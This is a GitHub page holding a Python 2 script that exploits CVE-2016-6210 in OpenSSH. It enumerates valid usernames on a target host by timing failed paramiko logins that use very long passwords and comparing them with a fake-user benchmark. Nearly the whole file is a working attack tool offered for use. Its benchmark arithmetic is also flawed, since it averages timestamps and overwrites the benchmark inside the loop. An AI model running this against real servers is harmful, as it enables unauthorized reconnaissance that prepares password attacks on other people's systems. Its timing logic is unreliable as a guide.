-
Notifications
You must be signed in to change notification settings - Fork 4
/
ssh_enum.py
87 lines (82 loc) · 3.47 KB
/
ssh_enum.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
#!/usr/bin/python
import paramiko
import time, sys, csv, os
import threading, multiprocessing
import logging
if(len(sys.argv) < 4):
print "REL: CVE-2016-6210"
print "Usage: "+sys.argv[0]+" uname_list.txt host outfile"
sys.exit()
p='A'*25000
THREAD_COUNT = 3 # This is also the amount of "samples" that the application will take into account for each calculation (time/THREAD_COUNT) = avg_resp;
FAKE_USER = "AaAaAaAaAa" # Benchmark user, I definitely don't exist
BENCHMARK = 0
num_lines = sum(1 for line in open(sys.argv[1]))
username_list = sys.argv[1]
var = 0; time_per_user = 0;
threads = []; usertimelist = {};
def ssh_connection(target, usertarget, outfile):
global time_per_user
starttime = 0; endtime = 0; total = 0;
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
starttime = time.clock()
try:
ssh.connect(target, username=usertarget,password=p)
except:
endtime = time.clock() # TIME the connection
total = endtime - starttime
# print usertarget+" : "+str(total) # print times of each connection attempt as its going (username:time)
with open(outfile, 'a+') as outputFile:
csvFile = csv.writer(outputFile, delimiter=',')
data = [[username, total]]
csvFile.writerows(data)
time_per_user += total
if not os.stat(username_list).st_size == 0:
print "- Connection logging set to paramiko.log, necessary so Paramiko doesn't fuss, useful for debugging."
paramiko.util.log_to_file("paramiko.log")
ssh_bench = paramiko.SSHClient()
ssh_bench.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print "- Calculating a benchmark using FAKE_USER for more accurate results..."
tempbench = []
for i in range(0,5):
starttime = time.clock()
try:
ssh_bench.connect(sys.argv[2], username=FAKE_USER,password=p)
except:
endtime = time.clock()
tempbench.append(endtime)
BENCHMARK = sum(i for i in tempbench)/5
print "* Benchmark Successfully Calculated: " + str(BENCHMARK)
with open(username_list) as users:
for username in users:
username = username.replace('\n','')
for i in range(THREAD_COUNT):
threader = threading.Thread(target=ssh_connection, args=(sys.argv[2], username, sys.argv[3]))
threads.append(threader)
for thread in threads:
thread.start()
thread.join()
threads = []
print "[+] Averaged time for username "+username+" : "+str((time_per_user/THREAD_COUNT))
usertimelist.update({username : (time_per_user/THREAD_COUNT)})
time_per_user = 0
else:
print "[-] List is empty.. what did you expect? Give me some usernames."
# [thread.start() for thread in threads] # Why doesn't true multithreading work?
# [thread.join() for thread in threads] # Tell me why?.. Why?
for user in sorted(usertimelist.items(), reverse=True):
BENCHMARK = user[1]/BENCHMARK
fname = sys.argv[2].replace('.','_')+"_valid_usernames.txt"
if((BENCHMARK <= .10)): # 10% or less
print "[+] " + user[0] + " invalid user; less than 10 percent of benchmark at: "+str(BENCHMARK)
elif ((BENCHMARK) < .20):
print "[+] " + user[0] + " toss up, not including based on current settings at: "+str(BENCHMARK)
elif (((BENCHMARK) >= .20) and (BENCHMARK) < .30): # 20% greater
print "[+] " + user[0] + " likely a valid user at: "+str(BENCHMARK) + ". Appending to: " + fname
with open(fname, "a+") as outputFile:
outputFile.write(user[0]+"\n")
elif ((BENCHMARK) >= .30): # 30% or greater above the benchmark
print "[+] " + user[0] + " is a valid user, appending to: " + fname
with open(fname, "a+") as outputFile:
outputFile.write(user[0]+"\n")